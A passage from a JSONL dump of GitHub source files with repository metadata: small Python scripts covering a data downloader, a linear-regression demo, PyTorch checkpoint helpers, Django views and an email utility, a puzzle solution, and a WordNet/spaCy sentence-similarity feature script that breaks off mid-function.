= sha\n \n def download(self, root = '.'):\n out=f'{root}/{self.sha}/{self.path}'\n 
os.makedirs(out,exist_ok=True)\n wget.download(self.link, out=out)\n\nclass CodeDatabase:\n def __init__(self):\n self.pair_list : list[tuple[CodeData]] = []\n self.review_data_list : list[ReviewData] = []\n \n def append(self, input, golden):\n self.pair_list.append((input, golden))\n print('Datasize :', len(self.pair_list))\n \n def download_review_data(self):\n root = 'pair_data'\n for idx, pair in enumerate(self.pair_list):\n pair[0].download(f'{root}/{idx}/input')\n pair[1].download(f'{root}/{idx}/golden')\n \n def append_review_data(self, review_data):\n self.review_data_list.append(review_data)\n print('Datasize :', len(self.review_data_list))\n \n def download_review_data(self):\n root = 'pair_data'\n for idx, review_data in enumerate(self.review_data_list):\n review_data.download(f'{root}/{idx}')","repo_name":"jimmylegendary/AICodeGen","sub_path":"CodeDatabase.py","file_name":"CodeDatabase.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"34926644876","text":"import random\nlst = [random.randint(0, 22) for i in range(10)]\nmin_val = int(input(\"Минимальное значение: \"))\nmax_val = int(input(\"Максимальное значение: \"))\nres = []\n\nfor i in range(len(lst)):\n if min_val <= lst[i] <= max_val:\n res.append(i)\n \nprint(f\"Случайно сгенерированный массив чисел: {lst}\")\nif res:\n print(f\"Индексы элементов, значения которых принадлежат заданному диапазону {res}\")\nelse:\n print(\"В списке нет элементов, которые принадлежали бы заданному диапазону.\")","repo_name":"Alex880326/Python","sub_path":"№32.py","file_name":"№32.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"35717260092","text":"## this displays arrows where the error came from\n\n#this for importing\n\ndef arrows(text,pos_start, pos_end):\n result=''\n \n #calculate indices\n\n idx_start = max(text.rfind('\\n',0, pos_start.index), 0)\n idx_end = text.find('\\n', idx_start + 1)\n if idx_end < 0: idx_end = len(text)\n\n # Generate each line\n line_count = pos_end.line - pos_start.line + 1\n for i in range(line_count):\n line = text[idx_start:idx_end]\n col_start = pos_start.column if i == 0 else 0\n col_end = pos_end.column if i == line_count - 1 else len(line) -1\n\n # Append to result\n result += line + '\\n'\n result += ' ' * col_start + '^' * (col_end - col_start)\n\n #Re-calculate indice\n idx_start = idx_end\n idx_end = text.find('\\n', idx_start + 1)\n if idx_end < 0:\n idx_end = len(text)\n\n return result.replace('\\t','')\n \n","repo_name":"JMA-Dv/ByCode","sub_path":"arrows.py","file_name":"arrows.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"23715472639","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n#Input datasets \r\ninputs_set = np.array([[1,0], [1 ,0.8] , [1, 1.6], [1, 3] , [1, 4] , [1 ,5]]) \r\noutput_set = np.array([[0.5],[1],[4],[5],[6],[9]])\r\n\r\ninputs = np.array([[0],[0.8],[1.6],[3],[4],[5]])\r\n\r\nepochs = 100\r\nlr = 0.01\r\ninputLayerNeurons, outputLayerNeurons = 2,1\r\n\r\n#Random weights and bias initialization(from -2 to 2)\r\nweights = np.random.random(size=(inputLayerNeurons,outputLayerNeurons))\r\nprint(\"initial weights \")\r\nprint(weights)\r\nweights_set = []\r\ntotal_error = []\r\ncalc_error = [0]\r\nfor i in 
range(epochs):\r\n\r\n\t#Backpropagation\r\n error = output_set - np.dot(inputs_set,weights)\r\n calc_error = (error**2)/2\r\n total_error.append(calc_error.copy())\r\n\r\n #Updating Weights and Biases\r\n weights += inputs_set.T.dot(error) * lr\r\n weights_set.append(weights.copy())\r\n\r\n\r\nprint(\"Final weights:\")\r\nprint(*weights)\r\n\r\ntotal_error = [sum(list(x.flatten())) for x in total_error]\r\nweights_0 = [list(x[0]) for x in weights_set]\r\nweights_1 = [list(x[1]) for x in weights_set]\r\n\r\n\r\n#plt.plot(total_error)\r\n\r\n\r\nf1 = plt.figure()\r\nf2 = plt.figure()\r\nax1 = f1.add_subplot(111)\r\nax2 = f2.add_subplot(111)\r\n\r\n\r\nax1.set_title('Weight Trajectories vs epochs(number of iterations)')\r\nax1.set_xlabel('Number of iterations')\r\nax1.plot(weights_0, label = \"bias\")\r\nax1.plot(weights_1, label = \"Weight\")\r\nax1.legend(bbox_to_anchor=(1,1), loc='upper left', borderaxespad=0.)\r\n\r\nx = np.linspace(0,10,100)\r\ny = (weights_1[99])*x+ (weights_0[99])\r\nax2.set_title('LMS fitting result')\r\nax2.plot(x, y, '-r')\r\nax2.scatter(inputs, output_set)\r\nax2.grid()\r\n\r\nplt.show()\r\n","repo_name":"kriti0111/NeuralNetsAssignment","sub_path":"assignment4.py","file_name":"assignment4.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"31250633448","text":"import torch\nimport os\nimport random\nimport numpy as np\nimport logging\nfrom torch import nn\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\ndef load_model(model, filepath):\n \"\"\"\n Loads model from file .pth\n :param model: ``XrayMRSCNN`` instance of model\n :param filepath: full path to file\n :return: ``XrayMRSCNN`` instance of model\n \"\"\"\n logger.info('Loading model...')\n model.load_state_dict(torch.load(filepath))\n model.eval()\n return model\n\n\ndef save_model(model, filepath):\n \"\"\"\n Saves all model\n :param model: ``XrayMRSCNN`` instance of model\n :param filepath: path to save directory\n \"\"\"\n torch.save(model.state_dict(), os.path.join(filepath, 'xray.pth'))\n\n\ndef set_seed(val):\n \"\"\"\n Freezes random sequences\n :param val: ``int`` random value\n \"\"\"\n random.seed(val)\n np.random.seed(val)\n torch.manual_seed(val)\n torch.cuda.manual_seed(val)\n torch.backends.cudnn.deterministic = True\n\n\ndef activation_func(activation):\n \"\"\"\n Gets instance of function\n :param activation: name function\n :return: instance of function\n \"\"\"\n return nn.ModuleDict([\n ['relu', nn.ReLU(inplace=False)],\n ['leaky_relu', nn.LeakyReLU(negative_slope=0.01, inplace=False)],\n ['selu', nn.SELU(inplace=False)],\n ['none', nn.Identity()]\n ])[activation]\n\n\ndef save_checkpoint(state, filename):\n \"\"\"\n Saves current state of model\n :param state: *args\n :param filename: path to save directory with filename\n \"\"\"\n torch.save(state, filename)\n\n\ndef make_checkpoint(epoch, model, optimizer, scheduler, loss_value, outdir):\n \"\"\"\n Saves current state train\n :param epoch: ``int`` number of current epoch\n :param model: instance of model\n :param optimizer: instance of optimizer\n :param scheduler: instance of scheduler\n :param loss_value: ``float`` current loss value\n :param outdir: ``str`` path to save directory\n \"\"\"\n save_name = os.path.join(outdir, 'xrayscnn_ep{}.pth'.format(epoch))\n save_checkpoint({\n 'start_epoch': epoch + 1,\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n 'scheduler': 
scheduler.state_dict(),\n 'losses': loss_value\n }, save_name)\n print('Save model: {}'.format(save_name))\n\n\ndef load_checkpoint(state, model, optimizer, scheduler):\n \"\"\"\n Loads state of model\n :param state: ``Dict`` state train\n :param model: instance of model\n :param optimizer: instance of optimizer\n :param scheduler: instance of scheduler\n \"\"\"\n \"\"\"load previous state of model\"\"\"\n model.load_state_dict(state['model'])\n optimizer.load_state_dict(state['optimizer'])\n scheduler.load_state_dict(state['scheduler'])\n","repo_name":"ErrorInever/XrayRSCNN","sub_path":"models/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"6390998449","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom user_app.models import User, Kid\nfrom user_app.decorator import parent_required\nfrom claim.models import ClaimList\nfrom django.core.paginator import Paginator\n\n# Create your views here.\n@login_required(login_url='login')\ndef account(request):\n \n return render(request, \"account.html\", context = None)\n\n@login_required(login_url='login')\ndef account_info(request):\n if request.user.is_kid:\n account = User.objects.get(username = request.user)\n kid = Kid.objects.get(user = request.user)\n credit = kid.reward_credit\n parent = User.objects.get(username = kid.parent)\n\n return render(request, \"account_info.html\", {'account':account, 'credit':credit, 'parent':parent }, )\n elif request.user.is_parent:\n account = User.objects.get(username = request.user)\n kids = account.kids_parent.all()\n\n return render(request, \"account_info.html\", {'account':account, 'kids':kids,}, ) \n\n@parent_required\ndef kid_claim(request, kid_id):\n request.session['kid_id']=kid_id\n if Kid.objects.get(user=kid_id).parent == request.user:\n active_claims = ClaimList.objects.filter(user=kid_id, status='NEW')\n\n paginator= Paginator(active_claims, 10)\n page = request.GET.get(\"page\")\n active_claims = paginator.get_page(page)\n return render(request, \"kid_claim.html\", {'active_claims':active_claims} )\n else:\n return redirect('access_denied')\n\n@parent_required\ndef accept(request, claim_id):\n claim = ClaimList.objects.get(pk=claim_id)\n if request.session.has_key('kid_id'):\n kid_id=request.session['kid_id']\n if Kid.objects.get(user=kid_id).parent == request.user:\n kid = Kid.objects.get(user = kid_id)\n kid.reward_credit += 1\n kid.save()\n claim.status = 'ACCEPTED'\n claim.save()\n return redirect('kid_claim', kid_id = kid_id)\n else:\n return redirect('access_denied')\n else:\n return redirect('access_denied')\n\n@parent_required\ndef decline(request, claim_id):\n claim = ClaimList.objects.get(pk=claim_id)\n if request.session.has_key('kid_id'):\n kid_id=request.session['kid_id']\n if Kid.objects.get(user=kid_id).parent == request.user:\n claim.status = 'DECLINED'\n claim.save()\n return redirect('kid_claim', kid_id = kid_id)\n else:\n return redirect('access_denied')\n else:\n return redirect('access_denied')\n","repo_name":"sonofman5024/Home_Manager","sub_path":"account/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"9796038109","text":"# coding: utf-8\nimport re\nimport smtplib\nimport urllib\nimport os\nfrom email.mime.multipart import 
MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom django.conf import settings\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.contrib.sites.models import Site\nfrom .models import MailTemplate\nfrom django.template import Context, Template\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import get_language\n\n\ndef send_email(subject, text, to, html=\"\", reply_email=''):\n from_email = settings.FROM_EMAIL\n\n mail = EmailMultiAlternatives(\n subject=subject, body=text, from_email=from_email, to=to)\n\n msgRoot = MIMEMultipart('related')\n msgRoot['Subject'] = subject\n msgRoot['From'] = from_email\n msgRoot['To'] = ', '.join(to)\n\n msgAlternative = MIMEMultipart('alternative')\n msgRoot.attach(msgAlternative)\n\n msgText = MIMEText(text.encode('UTF-8'), 'plain', 'UTF-8')\n msgAlternative.attach(msgText)\n\n links = re.compile(\"]*\\ssrc=\\\"(.*?)\\\"\").findall(html)\n media_root = settings.MEDIA_ROOT\n static_root = settings.STATIC_ROOT\n for i, link in enumerate(links):\n try:\n name = 'image%s' % i\n html = html.replace(link, 'cid:%s' % name)\n link = urllib.parse.unquote(\n link)\n if '/media/' in link and not link.startswith('/media/'):\n link = '/media/' + link.split('/media/')[1]\n elif '/static/' in link and not link.startswith('/static/'):\n link = '/static/' + link.split('/static/')[1]\n if '/media/' in link:\n path = os.path.join(media_root, link.split('/media/')[-1])\n elif '/static/' in link:\n path = os.path.join(\n static_root, link.split('/static/')[-1])\n fp = open(path, 'rb')\n msgImage = MIMEImage(fp.read(), _subtype=path.split('.')[-1])\n fp.close()\n\n msgImage.add_header('Content-ID', '<%s>' % name)\n msgRoot.attach(msgImage)\n except Exception as e:\n pass\n\n msgText = MIMEText(html.encode('UTF-8'), 'html', 'UTF-8')\n msgAlternative.attach(msgText)\n\n if to:\n try:\n use_gmail = getattr(settings, 'USE_GMAIL_SMTP', False)\n if use_gmail:\n smtp = smtplib.SMTP(settings.EMAIL_HOST)\n smtp.starttls()\n else:\n smtp = smtplib.SMTP()\n smtp.connect(settings.EMAIL_HOST)\n smtp.login(\n str(settings.EMAIL_HOST_USER),\n str(settings.EMAIL_HOST_PASSWORD)\n )\n smtp.sendmail(msgRoot['From'], to, msgRoot.as_string())\n smtp.quit()\n except:\n mail.attach_alternative(html, \"text/html\")\n mail.send(fail_silently=True)\n\ndef render(path, **params):\n \"\"\"Looking for template in DB firstly, than looking for the\n template on disk.\n \"\"\"\n name, file_type = path.split('/')[-1].split('.')\n site = Site.objects.get_current()\n site_url = f\"{settings.SITE_PROTOCOL}://{site}\"\n data = params\n language = get_language() or settings.LANGUAGE_CODE\n data.update({\n 'shop_name': getattr(\n settings, 'SHOP_NAME_%s' % language.upper(), \"\"),\n 'site': site,\n 'site_url': site_url\n })\n try:\n mail_template = MailTemplate.objects.get(name=name)\n template = mail_template.html_template\n\n t = Template(template)\n data.update({\n 'topic': mail_template.comment,\n })\n c = Context(data)\n return t.render(c)\n except MailTemplate.DoesNotExist:\n return render_to_string(path, data)\n","repo_name":"phonxis/konkord","sub_path":"konkord/apps/mail/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"34388752425","text":"input = __import__('sys').stdin.readline\nimport sys\n\ndef solution():\n n = int(input())\n if n == 0:\n sys.exit()\n\n ans = 
input().strip()\n a = ans.lower()\n for _ in range(n-1):\n temp = input().strip()\n if a > temp.lower():\n ans = temp\n a = temp.lower()\n\n print(ans)\n\nwhile 1:\n solution()","repo_name":"jungwookim/ps","sub_path":"boj/2204/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"25832435395","text":"#Gagandeep Singh Jossan gxj170003\r\n#Maitreyee Mhasakar mam171630\r\n\r\nimport pandas as pd\r\nfrom nltk.corpus import wordnet as wn\r\nimport spacy\r\nnlp = spacy.load('en')\r\nfrom nltk.stem.wordnet import WordNetLemmatizer\r\nfrom nltk import pos_tag\r\nimport numpy as np\r\nfrom nltk.corpus.reader import NOUN\r\nfrom nltk.corpus.reader import VERB\r\n#Load dataset into dataframe\r\n#df=pd.read_csv('C:/Users/gagan/OneDrive/Desktop/NLPProject/data/sample_train.txt', sep=\"\\t\",error_bad_lines=False)\r\ndf=pd.read_csv('C:/Users/maitr/OneDrive/Desktop/NLP_Project_4Dec//data/train-set.txt', sep=\"\\t\",error_bad_lines=False)\r\n\r\ndf.dropna(axis=0, how='any', thresh=None, subset=None, inplace=True)\r\n\r\n#print(df)\r\n#Prepare Dataframe and name columns\r\ndf.columns=[\"id\",\"Sentence1\",\"Sentence2\",\"Gold Tag\"]\r\ndf_features=df.copy()\r\n\r\n \r\ndef normalize(df):\r\n result = df.copy()\r\n max_value = df.max()\r\n min_value = df.min()\r\n result = (df - min_value) / (max_value - min_value)\r\n return result\r\n\r\ndef is_noun(tag):\r\n return tag in ['NN', 'NNS', 'NNP', 'NNPS']\r\n\r\n\r\ndef is_verb(tag):\r\n return tag in ['VB', 'VBD', 'VBG', 'VBN', 'VBP', 'VBZ']\r\n\r\n\r\ndef is_adverb(tag):\r\n return tag in ['RB', 'RBR', 'RBS']\r\n\r\n\r\ndef is_adjective(tag):\r\n return tag in ['JJ', 'JJR', 'JJS']\r\n\r\n\r\ndef penn_to_wn(tag, isOtherPOSRequired):\r\n if is_adjective(tag):\r\n return wn.ADJ\r\n elif is_noun(tag):\r\n return wn.NOUN\r\n elif is_adverb(tag):\r\n return wn.ADV\r\n elif is_verb(tag):\r\n return wn.VERB\r\n elif isOtherPOSRequired==True:\r\n return 'n'\r\n return 't'\r\n\r\n\r\n#*************Creating Dependency Parser for senetcnes in dataset**********\r\n#import spacy\r\n##Load the english module\r\n#nlp = spacy.load(\"en\")\r\n#\r\n#Dep_Sentence1=[]\r\n#Dep_Sentence2=[]\r\n#dependencies=['nsubj','dobj','iobj','ccomp','xcomp','nominal','nmod','amod','nummod','appos','det','case']\r\n#postags=['VB','VBD','VBG','VBN','VBP','VBZ','NN','NNS','NNP','NNPS']\r\n#for index, row in df_features.iterrows():\r\n# sen1= nlp(row['Sentence1'])\r\n# sen2= nlp(row['Sentence2'])\r\n# if index==0:\r\n# print(sen1)\r\n# print(sen2)\r\n# dep_sen1=[]\r\n# dep_sen2=[]\r\n# for token1 in sen1:\r\n# if token1.tag_ in postags or token1.head.tag_ in postags:\r\n# dep_sen1.append((token1.text,token1.dep_, token1.head.text))\r\n# for token2 in sen2:\r\n# if token2.tag_ in postags or token2.head.tag_ in postags:\r\n# dep_sen2.append((token2.text,token2.dep_, token2.head.text))\r\n# Dep_Sentence1.append(dep_sen1)\r\n# Dep_Sentence2.append(dep_sen2)\r\n\r\n \r\n##Store dependency parsered sentences in dataframe\r\n#df_features[\"DepPar_Sentence1\"] = Dep_Sentence1\r\n#df_features[\"DepPar_Sentence2\"] = Dep_Sentence2\r\n\r\n\r\nfrom nltk.tokenize import word_tokenize\r\ndf_features[\"Token_Sentence1\"] = df[\"Sentence1\"].apply(word_tokenize)\r\ndf_features[\"Token_Sentence2\"] = df[\"Sentence2\"].apply(word_tokenize)\r\n\r\ncommon_token_list=[]\r\nfor index, row in df_features.iterrows():\r\n common_token=set(row['Token_Sentence1']) and set(row['Token_Sentence2'])\r\n 
common_token_list.append(common_token)\r\n\r\ndf_features[\"Common_tokens\"] = common_token_list\r\n\r\npostag_Sentence1=[]\r\npostag_Sentence2=[]\r\nfor index, row in df_features.iterrows():\r\n sen1temp=[]\r\n sen2temp=[]\r\n for i in row['Token_Sentence1']:\r\n sen1temp.append(i)\r\n for j in row['Token_Sentence2']:\r\n sen2temp.append(j)\r\n postag_Sentence1.append(dict(pos_tag(sen1temp)))\r\n postag_Sentence2.append(dict(pos_tag(sen2temp)))\r\n \r\n \r\ndf_features[\"PosTag_Sentence1\"] = postag_Sentence1\r\ndf_features[\"PosTag_Sentence2\"] = postag_Sentence2 \r\n \r\nlemmatizer = WordNetLemmatizer()\r\nlemmatized_Sentence1=[]\r\nlemmatized_Sentence2=[]\r\npostaglemma_Sentence1=[]\r\npostaglemma_Sentence2=[]\r\nfor index, row in df_features.iterrows():\r\n sen1temp=[]\r\n sen2temp=[]\r\n for idx,i in enumerate(row['Token_Sentence1']):\r\n# print(penn_to_wn(df_features['PosTag_Sentence1'][index][idx][1]))\r\n w1 =lemmatizer.lemmatize(i,penn_to_wn(df_features['PosTag_Sentence1'][index][i],True))\r\n sen1temp.append(w1)\r\n for idx,j in enumerate(row['Token_Sentence2']):\r\n# print(penn_to_wn(df_features['PosTag_Sentence2'][index][idx][1]))\r\n w2 =lemmatizer.lemmatize(j,penn_to_wn(df_features['PosTag_Sentence2'][index][j],True))\r\n sen2temp.append(w2)\r\n postaglemma_Sentence1.append(dict(pos_tag(sen1temp)))\r\n postaglemma_Sentence2.append(dict(pos_tag(sen2temp)))\r\n lemmatized_Sentence1.append(sen1temp)\r\n lemmatized_Sentence2.append(sen2temp)\r\n\r\n\r\n\r\n\r\ndf_features[\"Lema_Sentence1\"] = lemmatized_Sentence1\r\ndf_features[\"Lema_Sentence2\"] = lemmatized_Sentence2\r\n\r\ndf_features[\"PosTagLema_Sentence1\"] = postaglemma_Sentence1\r\ndf_features[\"PosTagLema_Sentence2\"] = postaglemma_Sentence2\r\n\r\n\r\n#sen1ptags=[]\r\n#sen2ptags=[]\r\n#for index, row in df_features.iterrows():\r\n#\r\n# ttagss1 = {}\r\n# doc1 = nlp(row['Sentence1'])\r\n# for token in doc1:\r\n# ttagss1[token.text] = token.tag_\r\n# sen1ptags.append(ttagss1)\r\n# \r\n# ttagss2 = {}\r\n# doc2 = nlp(row['Sentence2'])\r\n# # record all possible edges\r\n# for token in doc2:\r\n# ttagss2[token.text] = token.tag_\r\n# sen2ptags.append(ttagss2)\r\n# \r\n# \r\n#df_features[\"Token_POS_Sent_1\"] = sen1ptags\r\n#df_features[\"Token_POS_Sent_2\"] = sen2ptags\r\n\r\ntknsen1ptags=[]\r\ntknsen2ptags=[]\r\nlema_token_s1 = []\r\nlema_token_s2 = []\r\nfor index, row in df_features.iterrows():\r\n\r\n lema1 = []\r\n doc1 = nlp(row['Sentence1'])\r\n for token in doc1:\r\n lemw1 = lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))\r\n lema1.append(lemw1)\r\n \r\n tknsen1ptags.append(dict(pos_tag(lema1)))\r\n lema_token_s1.append(lema1)\r\n# lemmatizer.lemmatize(token.head.text,penn_to_wn(token.head.tag_,True)),\r\n lema2 = []\r\n doc2 = nlp(row['Sentence2'])\r\n for token in doc2:\r\n lemw2 = lemmatizer.lemmatize(token.text,penn_to_wn(token.tag_,True))\r\n lema2.append(lemw2)\r\n \r\n tknsen2ptags.append(dict(pos_tag(lema2)))\r\n lema_token_s2.append(lema2)\r\n \r\ndf_features[\"Token_Lema_Sent_1\"] = lema_token_s1\r\ndf_features[\"Token_Lema_Sent_2\"] = lema_token_s2\r\ndf_features[\"Token_LemaPOS_Sent_1\"] = tknsen1ptags\r\ndf_features[\"Token_LemaPOS_Sent_2\"] = tknsen2ptags\r\n\r\n\r\n\r\nlistOfHypernymSent1 = []\r\nlistOfHypernymSent2 = []\r\n\r\nlistOfHyponymSent1 = []\r\nlistOfHyponymSent2 = []\r\n\r\nlistOfHolonymSent1 = []\r\nlistOfHolonymSent2 = []\r\n\r\nlistOfMeronymSent1 = []\r\nlistOfMeronymSent2 = []\r\n\r\nfrom nltk.corpus import wordnet\r\nfor index, row in df_features.iterrows():\r\n 
listOfSSHypePair = []\r\n listOfSSHypoPair = []\r\n listOfSSHoloPair = []\r\n listOfSSMeroPair = []\r\n for word in row['Token_Sentence1']:\r\n \r\n for ss in wordnet.synsets(word):\r\n listOfSSHypePair.extend(ss.hypernyms())\r\n listOfSSHypoPair.extend(ss.hyponyms())\r\n listOfSSHoloPair.extend(ss.part_holonyms())\r\n listOfSSMeroPair.extend(ss.part_meronyms())\r\n \r\n \r\n \r\n\r\n listOfHypernymSent1.append(set(listOfSSHypePair)) \r\n listOfHyponymSent1.append(set(listOfSSHypoPair)) \r\n listOfHolonymSent1.append(set(listOfSSHoloPair)) \r\n listOfMeronymSent1.append(set(listOfSSMeroPair))\r\n \r\n listOfSSHypePair = []\r\n listOfSSHypoPair = []\r\n listOfSSHoloPair = []\r\n listOfSSMeroPair = []\r\n \r\n\r\n for word in row['Token_Sentence2']:\r\n for ss in wordnet.synsets(word):\r\n listOfSSHypePair.extend(ss.hypernyms())\r\n listOfSSHypoPair.extend(ss.hyponyms())\r\n listOfSSHoloPair.extend(ss.part_holonyms())\r\n listOfSSMeroPair.extend(ss.part_meronyms())\r\n \r\n\r\n listOfHypernymSent2.append(set(listOfSSHypePair)) \r\n listOfHyponymSent2.append(set(listOfSSHypoPair)) \r\n listOfHolonymSent2.append(set(listOfSSHoloPair))\r\n listOfMeronymSent2.append(set(listOfSSMeroPair)) \r\n \r\n \r\n\r\n \r\ndf_features['Hyper_Sentence1'] = listOfHypernymSent1\r\ndf_features['Hyper_Sentence2'] = listOfHypernymSent2\r\n\r\ndf_features['Hypo_Sentence1'] = listOfHyponymSent1\r\ndf_features['Hypo_Sentence2'] = listOfHyponymSent2\r\n\r\ndf_features['Holo_Sentence1'] = listOfHolonymSent1\r\ndf_features['Holo_Sentence2'] = listOfHolonymSent2\r\n\r\ndf_features['Mero_Sentence1'] = listOfMeronymSent1\r\ndf_features['Mero_Sentence2'] = listOfMeronymSent2\r\n\r\n\r\n\r\n\r\n\r\n## Counties with population declines will be Vermillion, Posey and Madison.\r\n#[('Counties', 'nsubj', 'be'), ('with', 'prep', 'Counties'), ('population', 'compound', 'declines'), ('declines', 'pobj', 'with'),\r\n# ('will', 'aux', 'be'), ('be', 'ROOT', 'be'), ('Vermillion', 'attr', 'be'), (',', 'punct', 'Vermillion'),\r\n# ('Posey', 'conj', 'Vermillion'), ('and', 'cc', 'Posey'), ('Madison', 'conj', 'Posey'), ('.', 'punct', 'be')]\r\n#\r\n## Vermillion, Posey and Madison County populations will decline.\r\n#[('Vermillion', 'nmod', 'populations'), (',', 'punct', 'Vermillion'), ('Posey', 'conj', 'Vermillion'),\r\n# ('and', 'cc', 'Posey'), ('Madison', 'compound', 'County'), ('County', 'conj', 'Posey'), ('populations', 'nsubj', 'decline'),\r\n# ('will', 'aux', 'decline'), ('decline', 'ROOT', 'decline'), ('.', 'punct', 'decline')] \r\n\r\n\r\n\r\n# =============================================================================\r\n# # gives:\r\n# {'a': {'conclusive'},\r\n# 'n': {'conclusion', 'conclusions', 'conclusivenesses', 'conclusiveness'},\r\n# 'r': {'conclusively'},\r\n# 'v': {'concludes', 'concluded', 'concluding', 'conclude'}}\r\n# =============================================================================\r\n\r\nfrom nltk import pos_tag\r\n\r\npostag_Sentence1=[]\r\npostag_Sentence2=[]\r\n#List to store nouns and verbs in common in both sentences/total number of nouns and verbs in the sentence repectively.\r\nCommon_nouns_sen12=[]\r\nCommon_verbs_sen12=[]\r\n\r\narr=[]\r\narr1=[]\r\n\r\nfrom nltk.corpus import wordnet_ic\r\nbrown_ic = wordnet_ic.ic('ic-brown.dat')\r\nsemcor_ic = wordnet_ic.ic('ic-semcor.dat')\r\ndef getSimilarity(sim, word1, word2, pos1, pos2):\r\n lst = []\r\n try:\r\n word1synsets = wn.synsets(word1, pos1)\r\n except:\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n 
val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n return pd.Series(lst).dropna()\r\n try:\r\n word2synsets = wn.synsets(word2, pos2)\r\n except:\r\n lst.append(0.1);\r\n return pd.Series(lst).dropna()\r\n \r\n for w1 in word1synsets:\r\n for w2 in word2synsets:\r\n try:\r\n if(sim==\"path_similarity\"):\r\n val_sim = w1.path_similarity(w2)\r\n if(sim==\"lch_similarity\"):\r\n val_sim = w1.lch_similarity(w2)\r\n if(sim==\"wup_similarity\"):\r\n val_sim = w1.wup_similarity(w2)\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = w1.res_similarity(w2, brown_ic)\r\n# if(val_sim > 3.9):\r\n# val_sim = 3.9\r\n# if(sim==\"jcn_similarity\"):\r\n# ic1, ic2, lcs_ic = wn._lcs_ic(w1, w2, brown_ic)\r\n# icsum = (ic1 + ic2)\r\n# val_sim = w1.jcn_similarity(w2, brown_ic)\r\n# if(val_sim > 10 and ic1 == ic2 and ic2 == lcs_ic):\r\n# val_sim = 0.1\r\n# if(val_sim > 10 and (icsum == 2*lcs_ic)):\r\n# val_sim = 10\r\n# if(sim==\"lin_similarity\"):\r\n# val_sim = w1.lin_similarity(w2, semcor_ic)\r\n except:\r\n val_sim = -1\r\n if(val_sim == None or val_sim == -1 or val_sim < 0.01):\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n if(len(lst)==0):\r\n if(sim==\"path_similarity\"):\r\n val_sim = 0.1\r\n if(sim==\"lch_similarity\"):\r\n val_sim = 1.2\r\n if(sim==\"wup_similarity\"):\r\n val_sim = 0.1\r\n# if(sim==\"res_similarity\"):\r\n# val_sim = 0.1\r\n# if(sim==\"jcn_similarity\"):\r\n# val_sim = 0.1\r\n# else:\r\n# val_sim = 0.1\r\n lst.append(val_sim)\r\n return pd.Series(lst).dropna()\r\n\r\nHyperCommonDone = False\r\ndef getNormalizedCount(sim):\r\n Common_nouns_sen12=[]\r\n Common_verbs_sen12=[]\r\n comon_hyper_score = []\r\n for index, row in df_features.iterrows():\r\n list_of_nouns_sen1=[]\r\n list_of_verbs_sen1=[]\r\n \r\n list_of_nouns_sen2=[]\r\n list_of_verbs_sen2=[]\r\n \r\n #Variables to store count of number of nouns and verbs in the sentence.\r\n common_nouns=0\r\n common_verbs=0\r\n #Generate list of Nouns and Verbs in Sentence 1 and 2.\r\n \r\n for i in pos_tag(row['Lema_Sentence1']):\r\n # if i[1] in Nouns:\r\n if penn_to_wn(i[1],False)=='n':\r\n #Actual lematized token is appended to the list\r\n list_of_nouns_sen1.append(i[0])\r\n elif penn_to_wn(i[1],False)=='v':\r\n list_of_verbs_sen1.append(i[0])\r\n \r\n for j in pos_tag(row['Lema_Sentence2']):\r\n # if j[1] in Nouns:\r\n if penn_to_wn(j[1],False)=='n':\r\n list_of_nouns_sen2.append(j[0])\r\n \r\n # elif j[1] in Verbs:\r\n elif penn_to_wn(j[1],False)=='v':\r\n list_of_verbs_sen2.append(j[0])\r\n \r\n \r\n #Compare nouns from sentence 1 and 2\r\n if HyperCommonDone != True:\r\n score_common_hyp = 0\r\n lstcm_hypernyms = []\r\n for word in list_of_nouns_sen1:\r\n for wordsen2 in list_of_nouns_sen2:\r\n \r\n if HyperCommonDone != True:\r\n try:\r\n wordsyns = wn.synset(str(word) + '.n.01')\r\n wordsens2syns = wn.synset(str(wordsen2) + '.n.01')\r\n common_hyper_2words = wordsyns.lowest_common_hypernyms(wordsens2syns)\r\n lstcm_hypernyms.extend(common_hyper_2words)\r\n for hyp in common_hyper_2words:\r\n score_common_hyp = 